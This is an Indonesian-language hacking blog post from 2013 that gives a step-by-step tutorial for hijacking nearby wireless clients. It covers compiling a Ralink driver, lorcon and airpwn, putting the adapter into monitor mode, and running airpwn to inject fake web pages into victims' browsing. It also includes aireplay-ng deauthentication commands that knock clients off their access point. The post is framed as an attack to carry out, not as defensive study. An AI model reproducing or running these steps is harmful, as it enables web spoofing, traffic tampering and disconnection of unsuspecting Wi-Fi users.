Y00AOebLhlCX59D11qensmHJY7s Wifi Mass Spoofing ! Created (c) by Princexells Seyka (Princelling Saki)
Selamat datang di Flame Haze Pangkalpinang,Team cyber yang belum terkenal -_-

Berita

Berita

Kamis, 28 Maret 2013

0 Wifi Mass Spoofing !

Jaringan wireless memang sangat tidak aman jika digunakan untuk kegiatan bisnis yang bersifat penting, dengan menggunakan metode rouge Access Point, seorang intruder dengan mudahnya membajak jaringan wireless dan mengubah halaman website yang dibuka client dengan tampilan palsu, atau biasa kita kenal dng Web spoofing. OK langsung aja...
Persiapan
———
- Distro Fedora 10 (Cambridge)
- Wireless USB Dongle (ralink chipset)
- driver ralink
- airpwn
- lorcon

install dependensi yang dibutuhkan
———————————-
# yum install gcc automake kernel-devel libnet-devel prcre-devel

Download source code applikasi
——————————

Hapus driver ralink default dari kernel linux = rt73usb (wlan0)
—————————————————————
# rm -rvf /lib/modules/`uname -r`/kernel/driver/net/wireless/rt2*
# depmod -a

Compile dan Install Driver Ralink = rt73 (rausb0)
————————————————-
tar jxvf rt73-k2wrlz-3.0.1.tar.bz2
cd rt73-k2wrlz-3.0.1/Module
make
make install

Compile dan Install Lorcon
————————–
# cd lorcon
# ./configure –prefix=/usr
–localstatedir=/var
–mandir=/usr/share/man
–sysconfdir=/etc/lorcon
# make
# make install

Compile dan Install Airpwn
————————–
# tar zxvf airpwn-1.30.tgz
# cd airpwn-1.30
# ./configure –prefix=/usr/local –mandir=/usr/local/share/man
# make
# make install

* ” wew pada saat anda mengcompile airpwn ada tulisan error”
rupanya IFNAMSIZ belum di definisikan di dalam file wireless.h yang
berada di /usr/include/linux

# vi /usr/include/linux/wireless.h
tambahkan baris
#define IFNAMSIZ 16

* ulangi kembali tahap Compile dan Install Airpwn.

MULAI BERAKSI
=============
* Colokan Wireless USB Dongle ke lobang usb
# ifconfig rausb0 up
# iwconfig rausb0 mode monitor
# cd airpwn-1.30
# airpwn -c conf/great_html -d rt73 -i rausb0 -v -v -v
keterangan dari parameter airpwn.
-c = memanggil file konfigurasi dari airpwn.
-d = driver yang digunakan wireless, kebetulan saya menggunakan chipset ralink.
-i = nama device yang digunakan, dalam hal ini ralink telah disupport oleh lorcon
untuk menginject paket wireless.
-v = verbose mode, semakin banyak parameter -v maka semakin cepat pula verbose
yang ditampilkan.

* jika airpwn tidak berjalan, ada baiknya periksa apakah driver atau chipset yang anda gunakan sudah di support oleh lorcon dan airpwn jika sudah, tetapi tetap saja macet, coba putuskan koneksi dari client dengan acess point dengan menggunakan aircrack-ng agar si client mendapatkan paket arp yang baru.

# yum install aircrack-ng
# aireplay-ng -0 10 -a MAC_ADDR_ACCESS_POINT -c MAC_ADDR_CLIENT rausb0

* kemudian ulangi kembali perintah untuk menjalankan airpwn.


Artikel Terkait

Ditulis Oleh : Unknown

Artikel Wifi Mass Spoofing ! ini ditulis oleh Unknown pada hari Kamis, 28 Maret 2013. Terimakasih atas kunjungan Anda pada blog ini. Kritik dan saran tentang Wifi Mass Spoofing ! dapat Anda sampaikan melalui kotak komentar dibawah ini.

My Facebook

0 Comments

Bagaimana Pendapat Anda ?

 
Gabung di Grup Kami